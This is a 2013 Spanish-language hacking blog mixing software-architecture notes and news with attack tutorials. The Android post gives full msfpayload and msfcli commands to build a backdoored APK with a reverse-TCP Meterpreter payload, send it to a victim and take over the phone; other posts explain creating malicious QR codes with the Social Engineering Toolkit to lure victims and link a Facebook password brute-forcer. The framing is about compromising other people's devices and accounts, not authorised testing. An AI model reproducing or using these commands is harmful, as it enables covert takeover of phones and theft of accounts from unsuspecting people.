miércoles, 4 de septiembre de 2013

Un poco de Arquitectura de Software !

Arquitectura en el proceso de desarrollo
Requisitos -> Diseño ->Programación ->Test-> Mantenimiento
Diseño:
– Aclarar intenciones.
– Hacer explícitas las decisiones.
– Permitir análisis a nivel de sistemas.
Mantenimiento:
Reducir los costos de mantenimiento directa e indirectamente.

Arquitectura de Software
·         La arquitectura de un programa o sistema computacional es la estructura o estructuras de ese sistema, y comprende las componentes del software, sus propiedades externamente visibles, y las relaciones entre las mismas.
·         La arquitectura de software es un nivel de diseño diferente de los algoritmos y las estructuras de datos.
“el diseño y la especificación de la estructura del sistema como un todo es entonces un nuevo problema.”
·         Los elementos estructurales incluyen:
o    la organización y el control globales,
o    los protocolos de comunicación,
o    la distribución física,
o    la composición de elementos de diseño,
o    la escalabilidad y el rendimiento, y
o    la elección entre distintas alternativas de diseño.
Resumen:
• Un diseño de alto nivel.
• La estructura del sistema.
• Las componentes de un programa o sistema,sus relaciones, y principios que gobiernan su
diseño y su evolución en el tiempo.• Componentes y conectores.
• Componentes, conectores, configuración y restricciones.
No hay una definición única…
Posted on 17:45 | Categories:

jueves, 29 de agosto de 2013

Crear QRCode con S.E.T[Social Engineering Toolkit].

Creación de QRCode [Con Social Engineering Toolkit]

Hola!
En esté paper explicaremos algo sencillo, que son las QRCode, ¿Como las
creamos?.Antes de nada os explicare que son , las QRCode , son los códigos que
escaneamos con android, algún ejemplo podría ser esté :



Esté seria un QRCode, para infectar [Claramente Falso . Solo un ejemplo de
Ing Social ] , vamos a crearlo, lo primero de todo abriremos “S.E.T” y
seleccionamos la 1º opción : “1) Social-Engineering Attacks ” :

Después seleccionamos la opción 9 → “9) QRCode Generator Attack

Vector” y les saldrá algo así ......
Ahora nos pedirá que metamos el url , del que crearemos el QRCode, ejemplo
si su no-ip es icebreaker.no-ip.biz pues lo ponen y le dará un QR , hacia su
No-IP , bueno sencillo ¿no? Lo colocamos y ya nos lo crea nos dará una ruta

,donde se aloja la imagen ,la abrimos y hay lo tendremos la imagen....
Bueno ya lo tendríamos creado solo, sacar por la impresora o colgarlo en alguna

web y preparar un mensaje jugoso... >:-D

Nuestra Página de Facebook-> https://www.facebook.com/groups/PentestSupport/

Saludos! de J0k3$
Posted on 20:24 | Categories:

miércoles, 28 de agosto de 2013

Como hackear un Android [Post + Videotutorial.]

Hola! , 

 En esté post aprenderás a entrar en un android , con la maravillosa herramienta llamada Metasploit , dirás  ¿Enserio? , se podría entrar en un Android, claro! Empecemos.....

1º.-Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2º.-Una vez hecho eso pondremos en Metasploit lo siguiente....
search Android

Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada! bien...!! Hagamos este Apk Infectada...... Para hacerlo usaremos "MsfPayload" se aria así -> 
sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip/No-ip" LPORT=Puerto R > "Ruta+ Aplicación.apk"

Ejemplo : 
 sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /home/icebreaker/Escritorio/Hack.apk
Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit ......
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=”Su ip puesta en el backdoor” LPORT="Su puerto" E
Ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E 

 Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... 

O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para

ver los comandos que nos brinda Meterpreter ,para esté dispositivo...

Bueno hay pueden , ir probando ya tienen su dispositivo infectado! , acá les dejo el video hecho por mí para que lo vean y prueben , también trae como me muevo dentro de el móvil...
Link del video.




Saludos de J0K3$/Icebreaker.
Posted on 14:32 | Categories:

miércoles, 7 de agosto de 2013

Piden el cierre de Ask.fm por ola de suicidios


El reciente suicidio de 5 adolescentes que participaban en la red social Ask.fm ha encendido las alarmas sobre el ciberbullying en la red. El padre de Hannah Smith, quien se suicidó a causa de comentarios maliciosos que recibió de usuarios anónimos, pidió a las autoridades británicas que se movilicen para conseguir el cierre de la popular red social. Una de las principales críticas contra Ask es la posibilidad de dejar comentarios de manera anónima, lo que permite la impunidad en casos de ciberbullying. 
Posted on 10:44 | Categories:

martes, 6 de agosto de 2013

Comenzando en Android

Desde hace un tiempo, ya casi se ha vuelto una moda lo de la programación, tener el “poder” para crear nuestras propias aplicaciones, se ha transformado en algo muy atrayente.
Antes de conocer lenguajes y algoritmos e incluso si quiera pensar en que vamos a programar, comenzaremos buscando las herramientas para esto…


Lo primero es bajar el SDK de Android,  “Lo pueden encontrar haciendo click acá



Esto nos descargara lo que necesitamos, por ahora, Eclipse y el SDK, seguimos con la instalación de este último.



La instalación puede tardar un poco, al finalizar y abrir nuestro eclipse, ya se vera de forma distinta.




Como ven son cosas muy sencillas y fáciles de hacer, eclipse es un programa que viene de manera casi portable,  por lo cual no da problemas para su uso.
Les dejo con una imagen de cuando ya estamos comenzando a crear nuestra primera aplicación.





Hasta la proxima!



Posted on 7:54 | Categories:

jueves, 1 de agosto de 2013

Certified Ethical Hacker Versión 8

Certified Ethical Hacker Versión 8 tiene como objetivo dotar a los hackers profesionales con conocimientos sobre diversas infraestructuras de red de seguridad. La certificación es expedida por el Consejo Internacional de Comercio Electrónico ( EC-Council). El trabajo de un hacker ético certificado es acceder a un sistema de ordenador y reparar una falla de seguridad informática. Ellos son contratados para llevar a cabo pruebas de penetración sobre la base de la solicitud del titular del sistema, por lo que no se considera piratería ilegal. En la Versión 8 CEH curso, usted aprenderá cómo implementar las últimas tecnologías de hacking que son utilizados por los autores de incurrir en daños en el sistema de seguridad. Técnicas de hacking se refieren a las intrusiones realizadas por un hacker para causar los programas informáticos actúan de manera inusual. Los estudiantes aprenderán sobre diferentes herramientas de hacking que puede producir daños en el sistema con unos pocos clics.

Posted on 11:02 | Categories:

Hacking Mexico H̶a̶c̶k̶e̶r̶ Hacked

Desde hace unos días a sido publicado en internet un pastebin el cual tiene información
de Hacking Mexico, algunos se han adjudicado el ataque pero el "autor oficial" aun no esta
identificado.

Algunas de las cosas supuestamente publicadas son:
-Respaldo completo del servidor
-Bases de datos asociadas a la pagina

Entre otras cosas.


Pastebin con el supuesto ataque



Posted on 10:10 | Categories:

viernes, 12 de abril de 2013

miércoles, 27 de marzo de 2013

Matar Hacker esta justificado, PUBLICA LA OTAN

El papel de hackers, activistas cibernéticos y una serie más de personajes atrincherados detrás de una computadora es cada vez más determinante en los conflictos bélicos, ya sea para simplemente obtener información como para provocar caos y destrucción en las líneas enemigas. Ante este tipo de situaciones cada vez más frecuentes y, debido a lo vago de la legislación mundial en la red, un grupo de expertos de la Organización del Tratado Atlántico Norte han decidido ponerlos en su lista de objetivos Un libro respaldado por el Centro de Excelencia en Ciberdefensa de la Organización de la OTAN señala como objetivos potenciales a hackers, activistas cibernéticos y a todo aquel atacante auspiciado por estados, que pueden usar códigos maliciosos en la red para acabar con bases de datos e incluso atacar directamente a objetivos físicos. Por petición de la OTAN, más de 20 expertos –en conjunto con el Comité Internacional de la Cruz Roja y el Cibercomando de Estados Unidos– redactaron el llamado “Manual de Tallín de Legislación Internacional Aplicable a la Ciberamenazas” (CCD COE), el cual propone un nuevo conjunto de reglas acerca de cómo se debe realizar la guerra cibernética. De acuerdo con el diario Russia Today, el manual pretende sentar las bases y directrices sobre cómo actuar frente a ataques contra redes informáticas sensibles, una preocupación creciente para muchos estados y sobre todo por la OTAN .
Posted on 12:55 | Categories:

domingo, 17 de febrero de 2013

Facebook Brute Forcer

 
 __               _                 _    
 / _|             | |               | |   
| |_ __ _  ___ ___| |__   ___   ___ | | __
|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_|  __/ |_) | (_) | (_) |   < 
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
     bruteforcer...
     
Programmer : %s
Version    : %s''' % (__programmer__, __version__)
option         = '''
Usage  : %s [options]
Option : -u, --username   <username>      |   User for bruteforcing
         -w, --wordlist   <filename>      |   Wordlist used for bruteforcing 
         -v, --verbose    |   Set %s will be verbose
         -p, --proxy   <host:port> |   Set http proxy will be use
         -k, --usernameproxy <username> |   Set username at proxy will be use
         -i, --passproxy <password> |   Set password at proxy will be use
         -l, --log   <filename> |   Specify output filename (default : fbbruteforcer.log)
         -h, --help       <help>          |   Print this help
                                             
Example : %s -u brad@hackme.com -w wordlist.txt"
 

http://dl.packetstormsecurity.net/Crackers/fbruteforcer.py.txt



Posted on 18:29 | Categories:

sábado, 16 de febrero de 2013

¿Que es CIPE?

Crypto IP Encapsulation (CIPE)

CIPE es una implementación de VPN desarrollada principalmente para Linux. CIPE utiliza paquetes IP encriptados que son encapsulados, o «wrapped», en paquetes (UDP) de datagramas. A los paquetes CIPE se les da un encabezado con la información de destino y son encriptados usando un mecanismo de encriptación de CIPE. Los paquetes son luegos transferidos sobre IP como paquetes UDP a través del dispositivo de red virtual de CIPE (cipcbx) sobre una red portadora hasta el nodo remoto destino. La figura muestra una configuración CIPE típica conectando dos redes basadas en Linux: 



jueves, 14 de febrero de 2013

Armitage

¿Que es armitage? armitage es una herramienta gráfica para automatizar los ataques de metasploit, muy útil al momento de realizar una penetración a un servidor, ya que al momento de realizar un escaneo a un objetivo te dice que exploits son lo que podrían servir contra el objetivo, cuenta con muchas mas opciones que explicaremos mas adelante.


viernes, 8 de febrero de 2013

jueves, 7 de febrero de 2013

HULK - Realizando Ataque de Denegación de Servicio.


Bueno a continuación veremos un script basado en python llamado "HULK" cuyo objetivo es realizar ataques de denegación de servicio, es decir envía múltiples peticiones a un servidor hasta que este caiga, técnica muy ocupada por  "hacktivistas" como Anonymous.




Posted on 19:07 | Categories:

sábado, 2 de febrero de 2013

lunes, 28 de enero de 2013

Personalizando Backtrack 5 R3

Hola amigos de BackTrack Academy aquí les dejo este tutorial sobre como personalizar tu Backtrack 5 R3.
Aprenderás como cambiar el idioma,el teclado ,instalar algunos programas como admin(root)  configurar el arranque ,cambiar passwords y algunas cosas más.

Aqui les dejo el enlace del script:

Espero lo disfruten y no olviden suscribirs.

domingo, 20 de enero de 2013

sábado, 19 de enero de 2013

Nmap "Network Mapper"

Nmap:



Nmap ("Network Mapper") es un libre y de código abierto (licencia) de utilidad para la detección de red y auditoría de seguridad. Muchos sistemas y administradores de red también les resulta útil para tareas como inventario de la red, la gestión de los horarios de servicio de actualización y supervisión de host o tiempo de servicio. Nmap utiliza paquetes IP en bruto en formas novedosas para determinar qué hosts están disponibles en la red, qué servicios (nombre de la aplicación y versión) estos equipos ofrecen, qué sistemas operativos (y versiones del sistema operativo) que se están ejecutando, qué tipo de filtros de paquetes / cortafuegos están en uso, y docenas de otras características. Fue diseñado para escanear rápidamente grandes redes, pero funciona bien contra los ejércitos individuales. Nmap se ejecuta en todos los principales sistemas operativos de ordenador, y los paquetes oficiales binarios están disponibles para Linux, Windows y Mac OS X. Además de la clásica línea de comandos ejecutable de Nmap, la suite de Nmap incluye una avanzada interfaz gráfica de usuario y visor de resultados (Zenmap), una transferencia de datos flexible, cambio de dirección, y la herramienta de depuración (NCAT), una utilidad para comparar los resultados del análisis (Ndiff), y una generación de paquetes y una herramienta de análisis de la respuesta (Nping).

viernes, 18 de enero de 2013

Fake y Herramientas de Análisis

Hace unos días atrás una chica me agrego a mi cuenta de Facebook, parecía muy interesada, tenía fotos de una chica guapa, además de saber ingles y estudiar enfermería en la universidad “USACH”.
Todo comenzó muy bien, de una forma muy divertida, en un día ya se sentían las cosas fluir, pero espera, que las cosas no empezaron bien aquí.
La conocí con un Facebook que aparentaba ser falso, entre a Google imágenes y puse su foto de perfil, mostrando el resultado de la misma imagen en distintos blogs, cuentas de Facebook, fotologs, etc.
La salude y le dije que era simpática a pesar de ser un “fake”, así comenzaron las cosas, luego me agrego desde otro Facebook y comenzamos con una relación “algo sincera”.
No me podía quedar convencido de lo rápido y bien que se daban las cosas, sobre todo cuando eres un informático y tu mismo creas personajes de ensueño para convencer a tipos de que abran un PDF o una imagen y luego troyanizarlos…
Bien, comencé a usar Back Track para ayudarme un poco y así ir descartando cualquier intento que alguien de forma “ingeniosa” podría usar para atacarme;
Primero usé la herramienta exiftool para el análisis forense de las imágenes que recibí de ella, obviamente en una máquina virtual usando Linux. El resultado era algo distinto, ya parecía más real y al revisarlo desde google tampoco aparecían coincidencias.


viernes, 11 de enero de 2013

Backtrack 5 Rompiendo Claves WPA2-PSK


WPA2-PSK:

Bueno el siguiente tutorial muestra como romper una clave WPA2-PSK,siempre que quieren aumentar la seguridad de su red inalámbrica ocupan WPA2-PSK un método de encriptación más robusto que WEP. Básicamente la diferencia es que las claves WPA2-PSK es que soporta claves hasta 63 caracteres alfanuméricos, y dependiendo de la pre-share-key, el sistema genera nuevas claves que transmite al resto de los equipos, lo cual dificulta la acción de cifrado.




jueves, 10 de enero de 2013

TheHarverste - Backtrack 5


El objetivo de este programa es reunir a mensajes de correo electrónico, subdominios, los anfitriones, los nombres de los empleados, puertos abiertos y las banderas de diferentes fuentes públicas como los motores de búsqueda, servidores y bases de datos de la clave PGP ordenador SHODAN.


lunes, 7 de enero de 2013

jueves, 3 de enero de 2013